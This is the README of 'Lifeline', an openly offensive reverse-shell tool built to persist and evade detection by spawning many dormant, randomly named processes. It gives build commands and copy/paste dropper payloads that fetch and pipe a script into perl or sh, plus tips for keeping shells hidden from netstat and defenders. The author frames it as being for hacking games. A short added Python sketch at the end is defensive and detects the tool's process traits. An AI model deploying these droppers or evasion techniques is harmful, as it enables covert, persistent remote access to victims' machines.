Lifeline is a reverse shell that's designed to be hard to detect and hard to kill. It does this by spawning many dormant processes with randomized names that can take over when a shell is killed.
It is like the cockroach of reverse shells: not particularly nice to look at, but it will survive almost anything.
- Easily spawn many reverse shells as background processes
- Only one process will connect back to your listener, leaving all other processes undetected by netstat
- Random process names
- Does not use a pts
- Compatible with pwncat
- Included perl dropper runs directly from RAM.
- The reverse shell is compiled, making it harder to deploy if your target has a different architecture.
- GCC
- make
- python3 (used as a basic webserver)
To compile and serve a lifeline binary, use the following command:
make serve HOST=x.x.x.x
This command will build the binary, create dropper scripts, and host them using python3's web server.
[~/git/lifeline]~$ make serve HOST=10.0.0.12
=========================================================
Hosting dropper on http://10.0.0.12:8000...
Copy/Paste payloads:
In memory:
curl http://10.0.0.12:8000/dropper.pl | perl
wget -O - http://10.0.0.12:8000/dropper.pl | perl
Temp file:
curl http://10.0.0.12:8000/dropper.sh | sh
wget -O - http://10.0.0.12:8000/dropper.sh | sh
Raw download:
curl http://10.0.0.12:8000/lineline > lifeline
wget http://10.0.0.12:8000/lifeline
=========================================================
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
After which you can open a new terminal with a nc listener on port 1337 and wait for the callback.
From the nc listener, you can execute commands directly or drop into an sh process using the "!shell" command.
You can compile lifeline using the following command:
make HOST=x.x.x.x
This will place a compiled reverse shell in the build directory. You can start reverse shells by running the following command on the victim:
./lifeline [number of shells]
Flag | Description |
---|---|
HOST | Listener IP address. |
PORT | Listener port, defaults to 1337. |
NUM | Number of processes started by a dropper, defaults to 10. |
PY_PORT | Port used for Python http server, defaults to 8000. |
- Since the lifeline processes are spawned in quick succession, they will likely have sequential PIDs. Spawning a small number of new shells manually will yield better results than spawning 100 shells at once.
- By spawning a few lifelines without opening a listener, you can keep the processes hidden until your other shells are killed.
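From the defender's side, the traits this README describes (near-sequential PIDs, random process names, no pts) make a usable triage heuristic. The following Python sketch is an added example, not part of lifeline; the process listing is constructed, and the thresholds `min_len` and `max_gap` are assumptions to tune per host.

```python
from typing import NamedTuple

class Proc(NamedTuple):
    pid: int
    tty: str   # "?" means no controlling terminal
    comm: str

# Constructed sample in `ps -eo pid,tty,comm` layout (not from a real host).
SAMPLE_PS = """\
  PID TT       COMMAND
  812 ?        sshd
  901 pts/0    bash
 2001 ?        nginx
 2002 ?        nginx
 2003 ?        nginx
 2004 ?        nginx
 4411 ?        xkqzpt
 4412 ?        brmwla
 4413 ?        udvhse
 4414 ?        qoznyc
 4415 ?        tplgie
 4530 pts/0    ps
"""

def parse_ps(text):
    """Parse pid/tty/comm rows, skipping the header and malformed lines."""
    procs = []
    for line in text.splitlines():
        fields = line.split(None, 2)
        if len(fields) == 3 and fields[0].isdigit():
            procs.append(Proc(int(fields[0]), fields[1], fields[2]))
    return sorted(procs)

def suspicious_runs(procs, min_len=4, max_gap=2):
    """Runs of tty-less processes with near-sequential PIDs and all-distinct names."""
    detached = [p for p in procs if p.tty == "?"]
    runs, run = [], []
    for p in detached:
        if run and p.pid - run[-1].pid > max_gap:
            runs.append(run)
            run = []
        run.append(p)
    if run:
        runs.append(run)
    # Worker pools (e.g. nginx) share one name; a burst of unique names is the odd case.
    return [r for r in runs
            if len(r) >= min_len and len({p.comm for p in r}) == len(r)]

if __name__ == "__main__":
    for r in suspicious_runs(parse_ps(SAMPLE_PS)):
        print([(p.pid, p.comm) for p in r])
```

Kernel threads started at boot also have sequential PIDs, distinct names and no terminal, so treat hits as leads to triage rather than verdicts.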
No, I created this program mostly for "KOTH"-like hacking games, where reboots aren't really an issue.
The default "shell" is actually just a bunch of popen calls. You can either:
- Type "!shell" to drop into a shell.
- Use pwncat as a listener.